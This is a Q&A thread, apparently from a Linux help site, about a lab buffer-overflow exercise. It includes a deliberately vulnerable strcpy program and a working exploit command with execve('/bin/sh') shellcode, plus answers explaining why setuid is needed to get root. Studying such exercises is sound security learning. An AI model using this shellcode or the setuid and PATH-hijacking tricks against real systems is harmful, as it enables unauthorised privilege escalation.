# Run shellcode as root in a buffer overflow attack?

Tags: shell-script, security, python, root, privileges

I'm trying to exploit the following code:

```
#include <stdio.h>
#include <string.h>

int main(int argc, char** argv){
    char buffer[100];
    strcpy(buffer, argv[1]);

    return 0;
}
```

with the following command

```bash
./vuln $(python -c "import sys; sys.stdout.buffer.write(b'\x90'*60 + b'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80' + b'\x40\xd6\xff\xff'*6)")
```

The first part is the NOPs, the second part is the shell code
I took from [this website](https://shell-storm.org/shellcode/files/shellcode-811.html), and it should just `execve("/bin/sh")`. 
The last part is the return address. 
My program is compiled for a 32-bit system,
and with all protection mechanisms disabled. 
When I run my script, I get

```
process 15377 is executing new program: /usr/bin/bash
```

meaning `bash` is being run as the current user and not as root. 
Where can I find a shell code that runs a shell as root? 
Do I have to disable any Linux feature that prevents this?

When I run `whoami` I get the current user and not root. 
In this [“First Exploit! Buffer Overflow with Shellcode – bin 0x0E” video](https://www.youtube.com/watch?v=HSlhY4Uy8SA) the same script is used, and root access is granted.

Comment: Related: https://pubs.opengroup.org/onlinepubs/9699919799.2018edition/functions/setuid.html

Comment: using python to write bytes: OK, bit overkill :) you can just use escape sequences in strings…

Comment: @MarcusMüller: Yeah, but `'\x90'*60` is more manageable than `\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90`.

Comment: @G-ManSays'ReinstateMonica' fair :)

Answer (score 3, accepted):

> When I run my script, I get process 15377 is executing new program: /usr/bin/bash, meaning bash is being run as the current user and not as root.

Yeah, that's how the idea "user" works: you run a program, so it's run as the current user.

There's the `setuid` bit, a file property that you can give an executable file to make it always run as the owner of the file (possibly root) instead of the current user. For logical reasons, you can only add that bit to a file if you're already root (otherwise, *not* being root would be meaningless – you could always elevate your privileges by assigning the setuid bit to your copy of the bash executable, for example).

> Do I have to disable any Linux feature that prevents this.

That's not a specific feature, that is just literally what the idea of "user" is since the 1970s UNIX.

You can see in that guy's `id` output that the group is root, but the effective group isn't. So, the vulnerable file was already run with setuid/setgid bits set! Check the file's properties (`ls -l /…/stack-five`), and you'll see the `s` bit being set.

So, there was absolutely no escalation of any process's privileges – they were already there from the beginning, but now you can abuse the process to make use of them.

Comment: so is it possible to have a script or shellcode, that escalates priviledges?

Comment: no. That would be a fundamental security flaw in Linux, and be fixed instantly.

Comment: @MarcusMüller A bit of a nitpick, but flaws like this hypothetical flaw that you mentioned would still require time to be discovered, fixed and applied through updates. Distribution flavors which have slower cadency of updates ("stable" etc) would take the longest for the fix to propagate.

Comment: usually that's not quite true, because stable distros tend to be on LTS linux releases, which do get security backports rather quickly. And, don't forget that if a security flaw gets discovered in 2024, it's more likely to be caused by recent changes to Linux than by things that were like that since the 1990s; so, going for large stable distros usually incurs a small if any security bugfix latency, since Linux internally coordinates to not release a fix and thus announce a vulnerability on one maintained branch and thus leave another one exposed, while avoiding "fresh" bugs.

Answer (score 2):

No, you can’t just log in as yourself and do stuff
and get a root shell (escalate privileges). 
(Unless you discover a vulnerability in the kernel.) 
What you (theoretically) *can* do
is attack a process that’s already running as root. 
So you *might* be able to get a root shell
if you run your `vuln` program under `sudo`,
or if you chown it to root and turn on the setUID bit. 
This might seem like cheating,
but you’re simulating attacking a vulnerable system program.

It’s not evident from the [First Exploit! Buffer Overflow with Shellcode
– bin 0x0E](https://www.youtube.com/watch?v=HSlhY4Uy8SA) video that you linked to,
but the only way it can work
(the only way it can get the results it shows)
is if, as Marcus Müller says,
the `/opt/protostar/bin/stack5` program is setUID to root. 
I was able to find this statement:

> But despite the stack5 binary being owned by root,
> and having the setuid bit set, its not a root shell.

at [Exploit Exercises – Protostar – Stack5 / Our First Exploit](https://failingsilently.wordpress.com/2017/01/04/exploit-exercises-protostar-stack5-first-exploit)
at Failing Silently.

There’s a gotcha: executing a shell as root
might not give you a root shell. 
I invite and encourage you to research that. 
If you want to be more than a “script kiddie”,
you need to learn how to research stuff. 
But here’s a bread crumb for you: try changing your “shell code”
so it executes `/bin/id` directly instead of executing `/bin/sh`. 
It *might* show that you’ve obtained root,
even if you can’t get a root shell.

Comment: There are ways to escalate privilege without kernel exploits, for instance, if one sets a setUID to other program that is a shell script, it's possible to overwrite $PATH and trick that shell script into running a user supplied binary as root

Comment: Duh, yes; did you read the third sentence of my answer? What I said was that, to get root without exploiting the kernel, you have to exploit root — which is the same thing you’re saying.

Comment: @G-ManSays'ReinstateMonica' I agree, but: tone ;)